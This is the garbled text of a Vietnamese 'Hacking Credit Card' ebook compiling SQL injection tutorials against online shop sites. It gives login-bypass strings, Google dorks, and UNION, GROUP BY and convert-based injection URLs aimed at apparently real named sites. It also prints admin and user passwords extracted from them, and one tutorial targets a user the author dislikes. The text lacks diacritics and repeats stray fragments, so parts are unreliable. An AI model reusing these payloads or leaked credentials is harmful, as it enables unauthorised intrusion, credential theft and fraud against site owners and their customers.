okbi gi cc bc inject nhy n xem lI chnh xc n c b sql ij hay ko ,sau khi ij v submit th n ra ci ny Error Type: [QUOTE]Microsoft JET Database Engine (0x80040E14) Syntax error in string in query expression 'fldusername=''' and fldpassword='''.[/QUOTE] /asp/shopadmin.asp, line 34 Ok,trng hp l cc form login th chng ta rt d bit c tn column do error bn ra (cc trng hp khc trn URL th thng l c ra nhng column ko mong i cht no ) Ok,gi s chng ta bit l table cha 2 column fldusername,fldpassword l tbluser,okay,union xem sao [QUOTE]Username : union select 1,11 from tbluser Password :anything[/QUOTE] V n c ra ci ny y [QUOTE]Error Type: Microsoft JET Database Engine (0x80004005) Syntax error in FROM clause. /asp/shopadmin.asp, line 34[/QUOTE] TI sao vy ?cu query get c t form l sql = "select * from tbluser where fldusername= union select 1,1.. from tbluser' and fldpassword=anything bn ngay sau tbluser ca query Union s b tha 1 ci du nhy n do code chun n thm vo nn cu query tht l v ngha ,hc nu c thm and 1=2 union select i chng na th cng v ngha nn n mI bn ra ci thng bo [QUOTE]Syntax error in FROM clause.[/QUOTE] Okvy th chng ta s khc phc nh sau Username : union select 1 from tbluser where 1=1 Password:anything Mc ch thm ci where 1=1 nh vy ci du nhy ca query t ng thm nt du nhy cn lI vo where 1=1 --> han tan hp l phI ko no ?? V query lc ny nh sau: [QUOTE]sql = "select * from tbluser where fldusername= union select 1 from tbluser where 1=1 and fldpassword='anything[/QUOTE] h,1 ci error quen thuc bn ra [QUOTE]Microsoft JET Database Engine (0x80040E14) The number of columns in the two selected tables or queries of a union query do not match.[/QUOTE] Phn cn li rt d,chc cc bc bit ht ri nn ko ni y Xong nhng ch l xong khi chng ta khc phc iu ny khi exploit SQL ij trn cc form login m thi ,cn trn cc URL th sao ,c g khc so vi exploit trn form ?? hn cc bn bi sau trong thI gian ti (by gi bn thi hc k) MI Feedback xin post ln 4rum,xin ng PM,mail v..v
TUTORIAL HACK CFM FROM HCV

Thng th cc bn ch search site dnh sql injection v site xi ASP ng khng ... vy sao ko search nhng site dng cfm nh. Hum nay lt chi thy c site b li nn nh bo post bi cho anh em c c cu c g sai st v k thut xin anh em lng th Tui l newbie m ... Ln google g t kha : allinurl:"affiliate-agreement.cfm?storeid" V kt qu cho ta vi trang ... okie chn i 1 trang coi tui chn thng ny : QUOTE http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid= Thm du ' vo xem ... QUOTE http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=' QUOTE Error Executing Database Query. [Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax near ''. The error occurred in E:\mars\wwwroot\channel69shopping\store\loadconfig.cfm: line 4 Called from E:\mars\wwwroot\channel69shopping\store\affiliate-agreement.cfm: line 23 Called from E:\mars\wwwroot\channel69shopping\store\loadconfig.cfm: line 4 Called from E:\mars\wwwroot\channel69shopping\store\affiliate-agreement.cfm: line 23 2 : SELECT * 3 : FROM config 4 : WHERE ID=#storeid# 5 : </CFQUERY> Chc sao nhm ci error wen w dzy tri ... Gi ta th 1 cht xem sao QUOTE http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=%2bconvert(int,(select%20top%201% 20table_name%20from%20information_schema.tables))--sp_password c ... xem ci g hin ra n my b QUOTE Error Executing Database Query. [Macromedia][SequeLink JDBC Driver][ODBC Socket][Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'administration' to a column of data type int. Hay qu ta mi test ra ci mnh cn ri n ... Ly username v pass thui hihi qun ... vi thng ny bn khng th ly cng lc c username v pass c m bn phi ly tng thng mt ... Khng hiu sao ... K ... C cn hn khng nha QUOTE [url=http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=%2bconvert(int,(select%20top%201% 20username from administration]http://www.channel69shopping.com/store/aff...%201%20username[/url] from administration
Username l Administrator Ri pass na nha QUOTE [url=http://www.channel69shopping.com/store/affiliate-agreement.cfm?storeid=%2bconvert(int,(select%20top%201% 20password from administration]http://www.channel69shopping.com/store/aff...%201%20password[/url] from administration Hehe pass n : cartease Login i thi http://www.channel69shopping.com/store/admin check thnh cng post cho cc bc newbie nh destroyer thc hnh hope success
TUTORIAL NAY KHONG BIET TAC GIA

Trong ba i vi t na y, ti se co ke m theo qua trinh inject m t website va ly thuy t c ba n v SQL injection ca c ba n co th hi u ro hn. Nhng co le la chi cho newbie thi, khi na o r i ti se vi t va h ng dn advance sql injection, t t nhin co ke m theo m t site ca c ba n th c ha nh. Chu ng ta hay b t u : Sql injection ang d n ph bi n hi n nay, va co le l i nhi u nh t vn la ca c site MS SQl. No r t nguy hi m, no cho phe p chu ng ta login m khng cn username v password, remote execution, dump data va truy xu t username + password ra ngoa i b ng ca ch input ca c query/command vo input trc khi chuyn cho ng dng web x l. th xem site o co bi l i hay khng, ba n th input va o ca c field username va pass b ng : " or 1=1-or 1=1-' or a=a-" or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -hi' or 1=1 -hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'or''=' va co n r t nhi u n a ti khng ti n vi t y. R t co th ba n se login c va o v i quy n admin ho c m t user na o o . Nhng ba i vi t na y ti no i n ca ch truy xu t username va password ra ngoa i chu ng ta m c nhin va o trong CP. y, ti se l y ra m t site b t ky , nhng khi ba n mu n t n cng m t trang na o o thi la i kha c, ba n pha i bo cng ra tim link nhim. Mu c tiu t n cng :http://www.naame.com/manageAccount/manaccount516.asp By gi xa c inh xem co bi SQL injection khng, ba n th input ca c l nh ti li t k trn, khng by pass login c ba n input th d u ngo c n '
k t qua : Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '''. /manageAccount/acctIncludes/manaccount_inc.asp, line 33 th la bi t mu c tiu bi li r i nhe , by gi vi c c n la m la l y c ra ca c table name cu a no , du ng : 'having 1=1-- .Ba n hay y th y du --, vng trong MS SQL, t t ca ca c th sau -- se bi loa i bo . Microsoft OLE DB Provider for SQL Server error '80040e14' Column 'LoginTable.Account' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /manageAccount/acctIncludes/manaccount_inc.asp, line 33 Ok r i : Column 'LoginTable.Account' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. V y la ta l y c 1 table r i o . B c ti p theo : 'GROUP BY LoginTable.Account having 1=1-No ba o : Microsoft OLE DB Provider for SQL Server error '80040e14' Column 'LoginTable.UserName' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause. /manageAccount/acctIncludes/manaccount_inc.asp, line 33
La i l y c thm m t c t n a r i. Ba n thay va o : (thm 1 c t va ngn ca ch b ng d u ph y)
'GROUP BY LoginTable.Account, LoginTable.UserName having 1=1--
Ba n c la m th l y ca c table cu a no . Ti a l y sn ra cho ca c ba n : 'group by LoginTable.Account, LoginTable.UserName, LoginTable.Password, LoginTable.DomainName, LoginTable. Credits, LoginTable.LoginType having 1=1-L y c ca c table r i thi la m gi? Ca c ca c ba n nhin va o c t "username" va "password" la the m l m r i, mu n l y ra ngay, hic, nhng pha i t t a, i u ma v i. Co c no r i, ta th tim m t link bi l i (tim no trn tha nh address b ng ca ch thm ' va o sau = ho c =ca i gi o '). Nhng ma trang na y no khng co m t link na o dinh l i, thi ta la i d a va o ca i forum input v y.
Ta th nhe : (input va o field username va password r i submit th ). 'union select min(UserName),1,1,1,1,1 from LoginTable where UserName > 'h'-hi, ch c ca c ba n se ho i m y ca i th ng 1,1,1,1,1 la gi sao la i t o , no i nm na va d hi u cho newbie lun la ca c ba n m xem co bao nhiu c t ngoa i tr c t Username va thay cho m i c t o la 1 . th thi. Co n th ng UserName > 'h' a , no se "xu t" ra m t username b t ky b t u b ng letter 'h' . No ba o : Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'h20h20' to a column of data type int. /manageAccount/acctIncludes/manaccount_inc.asp, line 33 C i ti xem na o, co 1 th ng username la m ca nh r i nhe . Mu n bi t password cu a na o thi la m nh sau : 'union select Password,1,1,1,1,1 from LoginTable where UserName = 'h20h20'-Ta thay sau UserName la d u = 'username v a l y c'-No ba o : Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'legogame' to a column of data type int. /manageAccount/acctIncludes/manaccount_inc.asp, line 33 Hi, password la legogame kia, ba n login i, co n ch gi n a. * Note : N u ba n mu n l y thm nhi u username kha c thi : 'union select min(UserName),1,1,1,1,1 from LoginTable where UserName > 'h20h20'-no se l y ra m t username kha c. N u ba n mu n username b t u b ng B ch ng ha n, thi thay b ng 'b'-- th thi. trong tr ng h p ba n mu n t n login va o m t domain na o o inh tr c thi thay c t DomainName va o c t UserName. Vi du , ti ghe t th ng maika, no co ca i domain la H0MES4RENT.com mua o thi ti mu n bi t password cu a no ta du ng : 'union select password,1,1,1,1,1 from LoginTable where DomainName = 'H0MES4RENT.com'-No ba o : Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'joepinguelo' to a column of data type int. /manageAccount/acctIncludes/manaccount_inc.asp, line 33
Hi password la joepinguelo r i nhe , la i l y username cu a no i : 'union select UserName,1,1,1,1,1 from LoginTable where DomainName = 'H0MES4RENT.com'-K t qua : Microsoft OLE DB Provider for SQL Server error '80040e07' Syntax error converting the nvarchar value 'joepinguelo' to a column of data type int. /manageAccount/acctIncludes/manaccount_inc.asp, line 33 Va Username la joepinguelo Login th xem, Username : joepinguelo Password : joepinguelo

Ebook Hacking Credit Card Written by Hieupc SANGTAOTRE - Com Sua Tam

Uploaded by

Document Information

Original Title

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Ebook Hacking Credit Card Written by Hieupc SANGTAOTRE - Com Sua Tam

Uploaded by

Copyright:

Available Formats

Ebook nay c viet ra nham muc ch la hoc hoi va chia se kien thc. Email: hieuitpc@yahoo.com Homepage: http://cntt.pro.

Hacking Credit Card Version 2.0 --- Written by Hieupc

Okie, tip tc nh, bn s thm on code sau y vo: '%20union%20%20select%201%20from%20tbluser"having%201=1--sp_password

Khi thm xong th s nh th ny: http://www.victim.com/shopdisplayproducts.asp?id=5'%20union%20%20select%201%20from%20tbluser"having% 201=1--sp_password v c th? ny :

18 Please review these other products:

No gi chng ta bt u ly user and pass:

18 Please review these other products:

By gi ly username v password trn thay vo. Vic cn li chc cc bn bit.

Hacking Credit Card Version 1.0 --- Written by Hieupc

Khi thm xong link s nh th ny: http://www.carstereoinwales.co.uk/chris/shopdisplayproducts.asp?id=1%20union%20%20select%201%20from% 20tbluser%27 Oh khng d g y :)

V cc bn c user and pass ri y:

V d site ny: http://www.nelcoproducts.com/shopping/shopdisplayproducts.asp?id=153' cng thm vo du phy ( ` ) check li

TUTORIALS OF MY FRIENDS OR ORTHER AUTHORS

TUTORIAL FORM jonnyhackstuff

TUTORIAL FROM VIETHACKER

Tng hp cch hack cc cn bn nht!

Hack shop qua li SQL server injection

TUTORIAL NAY KHONG BIET TAC GIA

TUTORIAL FROM HCV

Nh vy ta c table u tin l StateTaxes. Ly tip table th hai : http://www.victim.com/store/category.asp?CategoryID=82%20and%201=convert(int,(select%20top%201% 20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20('StateTaxes')))-sp_password

TUTORIAL HACK CFM FROM HCV

TUTORIAL NAY KHONG BIET TAC GIA

La i l y c thm m t c t n a r i. Ba n thay va o : (thm 1 c t va ngn ca ch b ng d u ph y)

'GROUP BY LoginTable.Account, LoginTable.UserName having 1=1--

You might also like